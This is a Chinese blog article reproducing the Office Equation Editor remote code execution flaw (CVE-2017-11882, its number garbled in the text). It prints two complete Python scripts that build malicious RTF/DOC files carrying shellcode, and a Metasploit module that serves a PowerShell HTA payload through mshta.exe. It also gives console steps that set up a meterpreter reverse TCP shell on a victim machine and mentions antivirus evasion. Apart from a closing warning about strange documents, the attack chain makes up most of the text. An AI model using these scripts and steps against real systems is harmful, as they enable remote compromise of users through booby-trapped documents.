本文来自作者肖志华在GitChat上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录。
编辑 | 天津饭
直接贴本地复现过程,至于怎么利用还请自己思考。
11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏之久的 Office 远程代码执行漏洞(CVE--11882)。
该漏洞为 Office 内存破坏漏洞,影响目前流行的所有 Office 版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。
由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。
11月19日,监控到了已有漏洞 POC 在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。
漏洞影响到的版本有:
Office 365
Microsoft Office 2000
Microsoft Office
Microsoft Office Service Pack 3
Microsoft Office Service Pack 2
Microsoft Office Service Pack 1
Microsoft Office
等于说,影响现在主流的 Office 版本,基本可以做到通杀。
这里我给出两个 POC。
/embedi/CVE--11882,国外黑客所写
/Ridter/CVE--11882,国内黑客所写
两个 POC 的代码我也贴在下面。
Command43b_CVE--11882.py 的代码如下:
import argparseimport sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkind4\uc1\pard\sa200\sl276\slmult1\f0\fs22\lang9"""RTF_TRAILER = R"""\par}"""OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """OBJECT_TRAILER = R"""}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}010009000003510000000000120000000000050000000902000000000500000001000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}"""OBJDATA_TEMPLATE = R"""01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5f006f007400200045006e0074007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f006a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000000003000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c0000000ec4a900000000000000c8a75c00c4ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141120c430000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006f006e0020004e00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000004000000c5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c4550494354003421000035feffff900008003421cb010000010009000003c500000002001c0000000000050000000902000000000500000001000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d61746854797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e657720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a600190160a000000313131313131313131310c000000320a6001100f0a000000313131313131313131310c000000320a600190070a000000313131313131313131310c000000320a600110000a000000313131313131313131310a00000026060f000a00ffffffff0100000000001c000000fb021000070000000000bc0200000000010253797374656d000048008a0100000a000600000048008a01ffffffff7cef1800040000002d01010004000000f0010000030000000000"""COMMAND_OFFSET = 0x949*2def create_ole_exec_primitive(command):if len(command) > 43:print "[!] Primitive command must be shorter than 43 bytes"sys.exit(0)hex_command = command.encode("hex")objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]return OBJECT_HEADER + ole_data + OBJECT_TRAILERdef create_rtf(header,command,trailer):ole1 = create_ole_exec_primitive(command + " &")# We need 2 or more commands for executing remote file from WebDAV# because WebClient service start may take some timereturn header + ole1 + trailerdef getrheader(file):input_file = open(file,"r").read()r_header = input_file.split("{\*\datastore")[0]return r_headerif __name__ == '__main__':parser = argparse.ArgumentParser(description="PoC for CVE--11882")parser.add_argument("-c", "--command", help="Command to execute.", required=True)parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)args = parser.parse_args()if args.input != None:r_header = getrheader(args.input)else:r_header = RTF_HEADERrtf_content = create_rtf(r_header, mand ,RTF_TRAILER)output_file = open(args.output, "w")output_file.write(rtf_content)print "[*] Done ! output file --> " + args.output
Command109b_CVE--11882.py 的代码如下:
# Original poc :/embedi/CVE--11882# This version accepts a command with 109 bytes long in maximum.# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.# But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)import argparseimport sysfrom struct import packhead=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkind4\uc1 \pard\sa200\sl276\slmult1\f0\fs22\lang9'''objclass=r'''{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5f006f007400200045006e0074007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f006a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'''tail=r'''00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF900008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000001000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC0200000000010253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000}{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}{\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}{\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}{\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0\picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}010009000003510000000000120000000000050000000902000000000500000001000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}\par}'''#0: b8 44 eb 71 12mov eax,0x1271eb44#5: ba 78 56 34 12mov edx,0x12345678#a: 31 d0xor eax,edx#c: 8b 08mov ecx,DWORD PTR [eax]#e: 8b 09mov ecx,DWORD PTR [ecx]#10: 8b 09mov ecx,DWORD PTR [ecx]#12: 66 83 c1 3c add cx,0x3c#16: 31 dbxor ebx,ebx#18: 53 push ebx#19: 51 push ecx#1a: be 64 3e 72 12mov esi,0x12723e64#1f: 31 d6xor esi,edx#21: ff 16call DWORD PTR [esi] // call WinExec#23: 53 push ebx#24: 66 83 ee 4c sub si,0x4c#28: ff 10call DWORD PTR [eax] // call ExitProcessstage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"# pads with nopstage1=stage1.ljust(44,'\x90')def genrtf(cmd,r_head):if len(cmd) > 109:print "[!] Primitive command must be shorter than 109 bytes"sys.exit(0)payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'payload+=stage1payload+=pack('<I',0x00402114) # retpayload+='\x00'*2payload+=cmdpayload=payload.ljust(197,'\x00')return r_head+objclass+payload.encode('hex')+taildef getrheader(file):input_file = open(file,"r").read()r_header = input_file.split("{\*\datastore")[0]return r_header if __name__ == '__main__':parser = argparse.ArgumentParser(description="PoC for CVE--11882")parser.add_argument("-c", "--cmd", help="Command run in target system", required=True)parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)parser.add_argument("-i", "--input", help="Input normal rtf.", required=False)args = parser.parse_args()if args.input != None:r_header = getrheader(args.input)else:r_header = headwith open(args.output,'wb') as f:f.write(genrtf(args.cmd,r_header))f.close()print "[*] Done ! output file --> " + args.output
利用到的工具如下:
Windows7
Office
Metasploit
利用的过程如下:
打开上面的 Command43b_CVE--11882.py 的脚本,测试一下 DOC 文件。
使用命令如下:
python Command43b_CVE--11882.py -c "cmd.exe /c calc.exe" -o cve.doc
使用这条命令后会在目录里生成一个名为 cve.doc 的 doc 文件,拿到 Windows7 靶机去打开看看效果。如下图所示。
Windows7 打开恶意 doc 文件后,系统调用的计算器已经弹出,证明该 POC 是可行的(为什么要弹计算器……这个梗已经被众多黑客玩烂了……)。
MSF 进行漏洞利用
现在就需要一个 rb 脚本来和 MSF 进行交互,具体操作如下。
首先需要在 MSF 里添加这个脚本,如果 MSF 没有作改动,路径应该是 /usr/share/metasploit-framework/modules/exploits/windows,可以在这目录下新建一个文件夹。
将下面的脚本写入到 PS_shell.rb。
### This module requires Metasploit: /download# Current source: /rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info = {})super(update_info(info,'Name' => 'Microsoft Office Payload Delivery','Description' => %q{This module generates an command to place withina word document, that when executed, will retrieve a HTA payloadvia HTTP from an web server. Currently have not figured out howto generate a doc.},'License' => MSF_LICENSE,'Arch' => ARCH_X86,'Platform' => 'win','Targets' =>[['Automatic', {} ],],'DefaultTarget' => 0,))enddef on_request_uri(cli, _request)print_status("Delivering payload")p = regenerate_payload(cli)data = Msf::Util::EXE.to_executable_fmt(framework,ARCH_X86,'win',p.encoded,'hta-psh',{ :arch => ARCH_X86, :platform => 'win '})send_response(cli, data, 'Content-Type' => 'application/hta')enddef primerurl = get_uriprint_status("Place the following DDE in an MS document:")print_line("mshta.exe \"#{url}\"")endend
打开 MSF 后,搜搜漏洞利用模块。
msf > PS_shell
如下图所示。
使用该模块
msf > use exploit/windows/CVE--11882/PS_shell
如下图所示。
上图的操作过程如下:
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp //设置payload为反弹TCP连接payload => windows/meterpreter/reverse_tcpmsf exploit(PS_shell) > set lhost 192.168.30.128 //设置本机IPlhost => 172.16.253.76msf exploit(PS_shell) > set URIPATH test //设置URI地址URIPATH => abcmsf exploit(PS_shell) > show options //检查配置Module options (exploit/windows/CVE--11882/PS_shell):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0yes The local host to listen on. This must be an address on the local machine or 0.0.0.0SRVPORT 8080 yes The local port to listen on.SSL falseno Negotiate SSL for incoming connectionsSSLCertno Path to a custom SSL certificate (default is randomly generated)URIPATH test no The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC processyes Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.30.128 yes The listen addressLPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automatic
配置无误后即可执行,执行后 MSF 会监听本地8080端口,如果机器打开 doc 就会触发,反弹 shell 建立会话。
msf exploit(PS_shell) > exploit -j[*] Exploit running as background job.[*] Started reverse TCP handler on 192.168.30.128:4444 msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/test[*] Local IP: http://192.168.30.128:8080/test[*] Server started.[*] Place the following DDE in an MS document:mshta.exe "http://192.168.30.128:8080/test"
此时这个 test 显然不是一份 doc 格式的文件,我们需要用到刚刚用的 py 脚本文件,生成一份恶意的 doc 文件。
生成恶意 doc 文件
如下图所示。
这个时候,拿 test1.doc 文件到 Windows7 去打开试试,如下图所示。
Windows7 打开效果
如下图所示。
MSF 监听效果
如下图所示。
可以看到 MSF 已经和 Windows7 建立起了连接,此种攻击方式利用的是 powershell 反弹,打开恶意 doc 文档的时候会一闪而逝的“Poweshell”窗口。
net user
如下图所示。
到此漏洞复现完成。说点其他的,现在的攻击方式可不止 EXE 文件这种方式。
样本文件360会扫描识别到并且拦截,因为调用了 powershell,类似于恶意动作,360会报警。
但是可以用免杀处理一下,至于怎么处理,就看各位的功夫了。
一般人不会想到恶意 doc 文档攻击,尽量小心陌生人发来的东西,可能不止是 EXE 文件,doc 也可能会充满恶意。
近期热文
《如何高效开启你的顾问人生模式》
《Python 机器学习 Scikit-learn 完全入门指南》
《那些精贵的文献资源下载网址经验总结》
《Java 架构师眼中的 HTTP 协议》
《OpenVPN 的穿墙远程连接旅程》
《前端跨域问题各种解决方案》
《程序员跳槽时,如何高效地准备面试?》
「阅读原文」看交流实录,你想知道的都在这里